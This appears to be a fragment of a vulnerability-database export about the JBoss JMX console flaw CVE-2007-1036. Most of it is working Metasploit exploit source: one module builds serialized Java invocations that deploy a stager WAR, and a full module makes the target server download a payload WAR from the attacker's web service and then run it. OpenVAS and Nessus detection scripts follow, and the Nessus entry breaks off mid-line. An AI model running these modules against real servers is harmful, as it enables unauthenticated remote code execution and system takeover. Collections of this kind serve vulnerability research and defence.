'OSArch')\n\n build_invocation(stream)\n end\n\n def build_install_stager(opts = {})\n war_name = \"#{opts[:war_name]}.war\"\n jsp_name = opts[:jsp_name] || ''\n extension = opts[:extension] || '.jsp'\n data = opts[:data] || ''\n\n builder = Rex::Java::Serialization::Builder.new\n\n object_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),\n Rex::Java::Serialization::Model::EndBlockData.new,\n Rex::Java::Serialization::Model::Utf.new(nil, 'store')\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n values_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n Rex::Java::Serialization::Model::Utf.new(nil, war_name),\n Rex::Java::Serialization::Model::Utf.new(nil, jsp_name),\n Rex::Java::Serialization::Model::Utf.new(nil, extension),\n Rex::Java::Serialization::Model::Utf.new(nil, data),\n builder.new_object(\n name: 'java.lang.Boolean',\n serial: 0xcd207280d59cfaee,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new],\n fields: [['boolean', 'value']],\n data: [['boolean', 0]]\n )\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n types_array = builder.new_array(\n values_type: 'java.lang.String;',\n values: [\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'boolean')\n ],\n name: '[Ljava.lang.String;',\n serial: 0xadd256e7e91d7b47,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n stream.contents << object_array\n stream.contents << values_array\n stream.contents << types_array\n\n build_invocation_deploy(stream)\n end\n\n def build_delete_stager_file(opts = {})\n dir = opts[:dir] || ''\n file = opts[:file] || ''\n extension = opts[:extension] || '.jsp'\n\n builder = Rex::Java::Serialization::Builder.new\n\n object_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository'),\n Rex::Java::Serialization::Model::EndBlockData.new,\n Rex::Java::Serialization::Model::Utf.new(nil, 'remove')\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n values_array = builder.new_array(\n values_type: 'java.lang.Object;',\n values: [\n Rex::Java::Serialization::Model::Utf.new(nil, dir),\n Rex::Java::Serialization::Model::Utf.new(nil, file),\n Rex::Java::Serialization::Model::Utf.new(nil, extension)\n ],\n name: '[Ljava.lang.Object;',\n serial: 0x90ce589f1073296c,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n types_array = builder.new_array(\n values_type: 'java.lang.String;',\n values: [\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String'),\n Rex::Java::Serialization::Model::Utf.new(nil, 'java.lang.String')\n ],\n name: '[Ljava.lang.String;',\n serial: 0xadd256e7e91d7b47,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n stream.contents << object_array\n stream.contents << values_array\n stream.contents << types_array\n\n build_invocation_deploy(stream)\n end\n\n def build_invocation(stream_argument)\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n\n null_stream = build_null_stream\n null_stream_enc = null_stream.encode\n null_stream_value = [null_stream_enc.length].pack('N')\n null_stream_value << null_stream_enc\n null_stream_value << \"\\xfb\\x57\\xa7\\xaa\"\n\n stream_argument_enc = stream_argument.encode\n stream_argument_value = [stream_argument_enc.length].pack('N')\n stream_argument_value << stream_argument_enc\n stream_argument_value << \"\\x7b\\x87\\xa0\\xfb\"\n\n stream.contents << build_marshalled_invocation\n stream.contents << Rex::Java::Serialization::Model::NullReference.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x97\\x51\\x4d\\xdd\\xd4\\x2a\\x42\\xaf\")\n stream.contents << build_integer(647347722)\n stream.contents << build_marshalled_value\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, stream_argument_value)\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x01\")\n stream.contents << build_invocation_key(5)\n stream.contents << build_marshalled_value\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x02\")\n stream.contents << build_invocation_key(4)\n stream.contents << build_invocation_type(1)\n stream.contents << build_invocation_key(10)\n stream.contents << Rex::Java::Serialization::Model::NullReference.new\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n\n stream\n end\n\n def build_invocation_deploy(stream_argument)\n builder = Rex::Java::Serialization::Builder.new\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = []\n\n null_stream = build_null_stream\n null_stream_enc = null_stream.encode\n null_stream_value = [null_stream_enc.length].pack('N')\n null_stream_value << null_stream_enc\n null_stream_value << \"\\xfb\\x57\\xa7\\xaa\"\n\n stream_argument_enc = stream_argument.encode\n stream_argument_value = [stream_argument_enc.length].pack('N')\n stream_argument_value << stream_argument_enc\n stream_argument_value << \"\\x7b\\x87\\xa0\\xfb\"\n\n stream.contents << build_marshalled_invocation\n stream.contents << Rex::Java::Serialization::Model::NullReference.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x78\\x94\\x98\\x47\\xc1\\xd0\\x53\\x87\")\n stream.contents << build_integer(647347722)\n stream.contents << build_marshalled_value\n stream.contents << Rex::Java::Serialization::Model::BlockDataLong.new(nil, stream_argument_value)\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x01\")\n stream.contents << build_invocation_key(5)\n stream.contents << build_marshalled_value\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, null_stream_value)\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << Rex::Java::Serialization::Model::BlockData.new(nil, \"\\x00\\x00\\x00\\x03\")\n stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'JMX_OBJECT_NAME')\n stream.contents << builder.new_object(\n name: 'javax.management.ObjectName',\n serial: 0xf03a71beb6d15cf,\n flags: 3,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n stream.contents << Rex::Java::Serialization::Model::Utf.new(nil, 'jboss.admin:service=DeploymentFileRepository')\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n stream.contents << build_invocation_key(4)\n stream.contents << build_invocation_type(1)\n stream.contents << build_invocation_key(10)\n stream.contents << Rex::Java::Serialization::Model::NullReference.new\n stream.contents << Rex::Java::Serialization::Model::EndBlockData.new\n\n stream\n end\n\n def build_marshalled_invocation\n builder = Rex::Java::Serialization::Builder.new\n builder.new_object(\n name: 'org.jboss.invocation.MarshalledInvocation',\n serial: 0xf6069527413ea4be,\n flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n end\n\n def build_marshalled_value\n builder = Rex::Java::Serialization::Builder.new\n builder.new_object(\n name: 'org.jboss.invocation.MarshalledValue',\n serial: 0xeacce0d1f44ad099,\n flags: Rex::Java::Serialization::SC_BLOCK_DATA | Rex::Java::Serialization::SC_EXTERNALIZABLE,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n )\n end\n\n def build_invocation_key(ordinal)\n builder = Rex::Java::Serialization::Builder.new\n builder.new_object(\n name: 'org.jboss.invocation.InvocationKey',\n serial: 0xb8fb7284d79385f9,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new],\n fields: [\n ['int', 'ordinal']\n ],\n data:[\n ['int', ordinal]\n ]\n )\n end\n\n def build_invocation_type(ordinal)\n builder = Rex::Java::Serialization::Builder.new\n builder.new_object(\n name: 'org.jboss.invocation.InvocationType',\n serial: 0x59a73a1ca52b7cbf,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new],\n fields: [\n ['int', 'ordinal']\n ],\n data:[\n ['int', ordinal]\n ]\n )\n end\n\n def build_integer(value)\n builder = Rex::Java::Serialization::Builder.new\n builder.new_object(\n name: 'java.lang.Integer',\n serial: 0x12e2a0a4f7818738,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new],\n super_class: builder.new_class(\n name: 'java.lang.Number',\n serial: 0x86ac951d0b94e08b,\n annotations: [Rex::Java::Serialization::Model::EndBlockData.new]\n ),\n fields: [\n ['int', 'value']\n ],\n data:[\n ['int', value]\n ]\n )\n end\n\n def build_null_stream\n stream = Rex::Java::Serialization::Model::Stream.new\n stream.contents = [Rex::Java::Serialization::Model::NullReference.new]\n\n stream\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jboss_invoke_deploy.rb"}, {"lastseen": "2020-08-18T00:39:34", "description": "This module can be used to execute a payload on JBoss servers that have an exposed \"jmx-console\" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.\n", "published": "2012-06-19T17:59:15", "type": "metasploit", "title": "JBoss JMX Console Deployer Upload and Execute", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-1036", "CVE-2010-0738"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/MULTI/HTTP/JBOSS_MAINDEPLOYER", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /(Jetty|JBoss)/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'JBoss JMX Console Deployer Upload and Execute',\n 'Description' => %q{\n This module can be used to execute a payload on JBoss servers that have\n an exposed \"jmx-console\" application. The payload is put on the server by\n using the jboss.system:MainDeployer functionality. To accomplish this, a\n temporary HTTP server is created to serve a WAR archive containing our\n payload. This method will only work if the target server allows outbound\n connections to us.\n },\n 'Author' => [ 'jduck', 'Patrick Hof', 'h0ng10'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2007-1036' ],\n [ 'CVE', '2010-0738' ], # by using VERB other than GET/POST\n [ 'OSVDB', '33744' ],\n [ 'URL', 'http://www.redteam-pentesting.de/publications/jboss' ],\n [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=574105' ], #For CVE-2010-0738\n ],\n 'DisclosureDate' => 'Feb 20 2007',\n 'Privileged' => true,\n 'Platform' => %w{ java linux win },\n 'Stance' => Msf::Exploit::Stance::Aggressive,\n 'Targets' =>\n [\n #\n # do target detection but java meter by default\n # detect via /manager/serverinfo\n #\n [ 'Automatic (Java based)',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n }\n ],\n\n #\n # Platform specific targets only\n #\n [ 'Windows Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n },\n ],\n [ 'Linux Universal',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n },\n ],\n\n #\n # Java version\n #\n [ 'Java Universal',\n {\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n }\n ]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(8080),\n OptString.new('HttpUsername', [ false, 'The username to authenticate as' ]),\n OptString.new('HttpPassword', [ false, 'The password for the specified username' ]),\n OptString.new('JSP', [ false, 'JSP name to use without .jsp extension (default: random)', nil ]),\n OptString.new('APPBASE', [ false, 'Application base name, (default: random)', nil ]),\n OptString.new('PATH', [ true, 'The URI path of the console', '/jmx-console' ]),\n OptString.new('WARHOST', [ false, 'The host to request the WAR payload from' ]),\n OptString.new('SRVHOST', [ true, 'The local host to listen on. This must be an address on the local machine' ]),\n OptEnum.new('VERB', [true, 'HTTP Method to use (for CVE-2010-0738)', 'GET', ['GET', 'POST', 'HEAD']])\n\n\n ])\n end\n\n\n def auto_target\n if datastore['VERB'] == 'HEAD' then\n print_status(\"Sorry, automatic target detection doesn't work with HEAD requests\")\n else\n print_status(\"Attempting to automatically select a target...\")\n res = query_serverinfo\n if not (plat = detect_platform(res))\n fail_with(Failure::NoTarget, 'Unable to detect platform!')\n end\n\n if not (arch = detect_architecture(res))\n fail_with(Failure::NoTarget, 'Unable to detect architecture!')\n end\n\n # see if we have a match\n targets.each { |t| return t if (t['Platform'] == plat) and (t['Arch'] == arch) }\n end\n\n # no matching target found, use Java as fallback\n java_targets = targets.select {|t| t.name =~ /^Java/ }\n return java_targets[0]\n end\n\n\n def exploit\n jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8))\n app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8))\n\n mytarget = target\n if (target.name =~ /Automatic/)\n mytarget = auto_target()\n if (not mytarget)\n fail_with(Failure::NoTarget, \"Unable to automatically select a target\")\n end\n print_status(\"Automatically selected target \\\"#{mytarget.name}\\\"\")\n else\n print_status(\"Using manually select target \\\"#{mytarget.name}\\\"\")\n end\n arch = mytarget.arch\n\n # set arch/platform from the target\n plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]\n\n # We must regenerate the payload in case our auto-magic changed something.\n return if ((p = exploit_regenerate_payload(plat, arch)) == nil)\n\n # Generate the WAR containing the payload\n @war_data = p.encoded_war({\n :app_name => app_base,\n :jsp_name => jsp_name,\n :arch => mytarget.arch,\n :platform => mytarget.platform\n })\n\n #\n # UPLOAD\n #\n resource_uri = '/' + app_base + '.war'\n service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri\n print_status(\"Starting up our web service on #{service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n\n if (datastore['WARHOST'])\n service_url = 'http://' + datastore['WARHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri\n end\n\n print_status(\"Asking the JBoss server to deploy (via MainDeployer) #{service_url}\")\n if (datastore['VERB'] == \"POST\")\n res = send_request_cgi({\n 'method' => datastore['VERB'],\n 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),\n 'vars_post' =>\n {\n 'action' => 'invokeOpByName',\n 'name' => 'jboss.system:service=MainDeployer',\n 'methodName' => 'deploy',\n 'argType' => 'java.lang.String',\n 'arg0' => service_url\n }\n }, 30)\n else\n res = send_request_cgi({\n 'method' => datastore['VERB'],\n 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),\n 'vars_get' =>\n {\n 'action' => 'invokeOpByName',\n 'name' => 'jboss.system:service=MainDeployer',\n 'methodName' => 'deploy',\n 'argType' => 'java.lang.String',\n 'arg0' => service_url\n }\n }, 30)\n end\n if (! res)\n fail_with(Failure::Unknown, \"Unable to deploy WAR archive [No Response]\")\n end\n if (res.code < 200 or res.code >= 300)\n case res.code\n when 401\n print_warning(\"Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}\")\n end\n fail_with(Failure::Unknown, \"Upload to deploy WAR archive [#{res.code} #{res.message}]\")\n end\n\n # wait for the data to be sent\n print_status(\"Waiting for the server to request the WAR archive....\")\n waited = 0\n while (not @war_sent)\n select(nil, nil, nil, 1)\n waited += 1\n if (waited > 30)\n fail_with(Failure::Unknown, 'Server did not request WAR archive -- Maybe it cant connect back to us?')\n end\n end\n\n print_status(\"Shutting down the web service...\")\n stop_service\n\n\n #\n # EXECUTE\n #\n print_status(\"Executing #{app_base}...\")\n\n # The payload doesn't like POST requests\n # As the war file is not stored inside the jmx-console, we don't have to\n # care about the selected http method\n tmp_verb = datastore['VERB']\n tmp_verb = 'GET' if tmp_verb == 'POST'\n\n # JBoss might need some time for the deployment. Try 5 times at most and\n # wait 3 seconds inbetween tries\n uri = '/' + app_base + '/' + jsp_name + '.jsp'\n num_attempts = 5\n num_attempts.times do |attempt|\n res = send_request_cgi({\n 'uri' => uri,\n 'method' => tmp_verb\n }, 30)\n\n msg = nil\n if (! res)\n msg = \"Execution failed on #{app_base} [No Response]\"\n elsif (res.code < 200 or res.code >= 300)\n msg = \"Execution failed on #{app_base} [#{res.code} #{res.message}]\"\n elsif (res.code == 200)\n print_good(\"Successfully triggered payload at '#{uri}'\")\n break\n end\n\n if (attempt < num_attempts - 1)\n msg << \", retrying in 3 seconds...\"\n print_error(msg)\n\n select(nil, nil, nil, 3)\n else\n print_error(msg)\n end\n end\n\n #\n # DELETE\n #\n # XXX: Does undeploy have an invokeByName?\n #\n print_status(\"Undeploying #{app_base} ...\")\n res = send_request_cgi({\n 'method' => datastore['VERB'],\n 'uri' => normalize_uri(datastore['PATH'], '/HtmlAdaptor'),\n 'vars_post' =>\n {\n 'action' => 'invokeOpByName',\n 'name' => 'jboss.system:service=MainDeployer',\n 'methodName' => 'methodName=undeploy',\n 'argType' => 'java.lang.String',\n 'arg0' => app_base\n }\n }, 30)\n if (! res)\n print_warning(\"WARNING: Undeployment failed on #{app_base} [No Response]\")\n elsif (res.code == 500 and datastore['VERB'] == 'POST')\n # POST requests result in a http 500 error, but the payload is removed...\"\n print_warning(\"WARNING: Undeployment might have failed (unlikely)\")\n elsif (res.code < 200 or res.code >= 300)\n print_warning(\"WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]\")\n end\n\n handler\n end\n\n\n # Handle incoming requests from the server\n def on_request_uri(cli, request)\n\n #print_status(\"on_request_uri called: #{request.inspect}\")\n if (not @war_data)\n print_error(\"A request came in, but the WAR archive wasn't ready yet!\")\n return\n end\n\n print_status(\"Sending the WAR archive to the server...\")\n send_response(cli, @war_data)\n @war_sent = true\n end\n\n\n def query_serverinfo\n path = normalize_uri(datastore['PATH'], '/HtmlAdaptor') + '?action=inspectMBean&name=jboss.system:type=ServerInfo'\n res = send_request_raw(\n {\n 'uri' => path\n }, 20)\n\n if (res) && (res.code == 401)\n fail_with(Failure::NoAccess,\"Unable to bypass authentication. Try changing the verb to HEAD to exploit CVE-2010-0738.\")\n end\n\n if (not res) or (res.code != 200)\n fail_with(Failure::Unknown,\"Failed: Error requesting #{path}\")\n end\n\n res\n end\n\n def autofilter\n true\n end\n\n # Try to autodetect the target platform\n def detect_platform(res)\n if (res.body =~ /<td.*?OSName.*?(Linux|FreeBSD|Windows).*?<\\/td>/m)\n os = $1\n if (os =~ /Linux/i)\n return 'linux'\n elsif (os =~ /FreeBSD/i)\n return 'linux'\n elsif (os =~ /Windows/i)\n return 'win'\n end\n end\n nil\n end\n\n\n # Try to autodetect the target architecture\n def detect_architecture(res)\n if (res.body =~ /<td.*?OSArch.*?(x86_64|amd64|x86|i386|i686).*?<\\/td>/m)\n case arch\n when 'x86', 'i386', 'i686'\n return ARCH_X86\n when 'x86_64', 'amd64'\n return ARCH_X64\n end\n end\n nil\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/jboss_maindeployer.rb"}], "openvas": [{"lastseen": "2020-05-12T16:22:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1036"], "description": "The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.", "modified": "2020-05-08T00:00:00", "published": "2019-07-12T00:00:00", "id": "OPENVAS:1361412562310142595", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310142595", "type": "openvas", "title": "JBoss Console and Web Management Misconfiguration Vulnerability", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = 'cpe:/a:redhat:jboss_application_server';\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.142595\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2019-07-12 06:01:03 +0000 (Fri, 12 Jul 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2007-1036\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n\n script_name(\"JBoss Console and Web Management Misconfiguration Vulnerability\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"JBoss_enterprise_aplication_server_detect.nasl\");\n script_mandatory_keys(\"jboss/detected\");\n\n script_tag(name:\"summary\", value:\"The default configuration of JBoss does not restrict access to the console and\n web management interfaces, which allows remote attackers to bypass authentication and gain administrative access\n via direct requests.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if the jmx-console or web-console is accessible without authentication.\");\n\n script_tag(name:\"solution\", value:\"As stated by Red Hat, the JBoss AS console manager should always be secured\n prior to deployment, as directed in the JBoss Application Server Guide and release notes. By default, the JBoss\n AS installer gives users the ability to password protect the console manager. If the user did not use the\n installer, the raw JBoss services will be in a completely unconfigured state and these steps should be performed\n manually. See the referenced advisories for mitigation steps.\");\n\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/632656/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/460597/100/0/threaded\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nurl = dir + \"/web-console/ServerInfo.jsp\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss Management Console - Server Information</title>\",\n check_header: TRUE, extra_check: \"Management Console\")) {\n report = 'It was possible to access the JBoss Web Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nurl = dir + \"/jmx-console/\";\n\nif (http_vuln_check(port: port, url: url, pattern: \"<title>JBoss JMX Management Console\",\n check_header: TRUE)) {\n report += '\\n\\nIt was possible to access the JBoss JMX Management Console at ' +\n http_report_vuln_url(port: port, url: url, url_only: TRUE);\n}\n\nif (report) {\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-01T01:33:43", "description": "According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\n\nThis plugin determines if DCNM is vulnerable by checking the version\nnumber displayed in the web interface. The web interface is not\navailable in older versions of DCNM.", "edition": 27, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2013-07-11T00:00:00", "title": "Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-1036", "CVE-2012-5417"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:cisco:prime_data_center_network_manager"], "id": "CISCO_PRIME_DCNM_6_1_2.NASL", "href": "https://www.tenable.com/plugins/nessus/67247", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67247);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2018/11/15 20:50:22\");\n\n script_cve_id(\"CVE-2007-1036\", \"CVE-2012-5417\");\n script_bugtraq_id(56348);\n script_xref(name:\"CERT\", value:\"632656\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCtz44924\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCua31204\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20121031-dcnm\");\n\n script_name(english:\"Cisco Prime Data Center Network Manager RMI Remote Code Execution (uncredentialed check)\");\n script_summary(english:\"Checks DCNM version number\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A network management system installed on the remote host is affected\nby a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Data Center Network Manager (DCNM) installed on the remote host\nis affected by a remote code execution vulnerability. Unauthorized\nusers have access to the JBoss Application Server Remote Method\nInvocation services. A remote, unauthenticated attacker could exploit\nthis to execute arbitrary code as SYSTEM (on Windows) or root (on\nLinux).\n\nThis plugin determines if DCNM is vulnerable by checking the version\nnumber displayed in the web interface. The web interface is not\navailable in older versions of DCNM.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20121031-dcnm\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2ef95f6c\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Cisco Prime Data Center Network Manager 6.1(2) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploithub_sku\", value:\"EH-12-667\");\n script_set_attribute(attribute:\"exploit_framework_exploithub\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'JBoss JMX Console Deployer Upload and Execute');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(264);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2007/02/20\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_data_center_network_manager\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_prime_dcnm_web_detect.nasl\");\n script_require_keys(\"installed_sw/cisco_dcnm_web\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nappname = \"Cisco Prime DCNM\";\napp_id = \"cisco_dcnm_web\";\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:80);\ninstall = get_single_install(app_name:app_id, port:port, exit_if_unknown_ver:TRUE);\n\nurl = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nmatch = eregmatch(string:ver, pattern:\"^([0-9.]+)\\(([^)]+)\\)\");\nif (isnull(match)) exit(1, \"Failed to parse the version (\"+ver+\").\");\n\nmajor = match[1];\nbuild = match[2];\n\nif (\n ver_compare(ver:major, fix:'6.1', strict:FALSE) > 0 || # < 